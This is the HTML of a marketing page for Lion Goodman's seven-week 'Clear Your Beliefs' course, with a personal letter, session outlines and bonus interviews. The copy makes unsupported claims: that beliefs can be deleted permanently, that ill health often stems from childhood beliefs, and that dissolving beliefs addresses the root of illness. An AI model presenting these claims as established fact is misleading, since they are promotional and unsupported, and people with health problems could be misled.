beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div 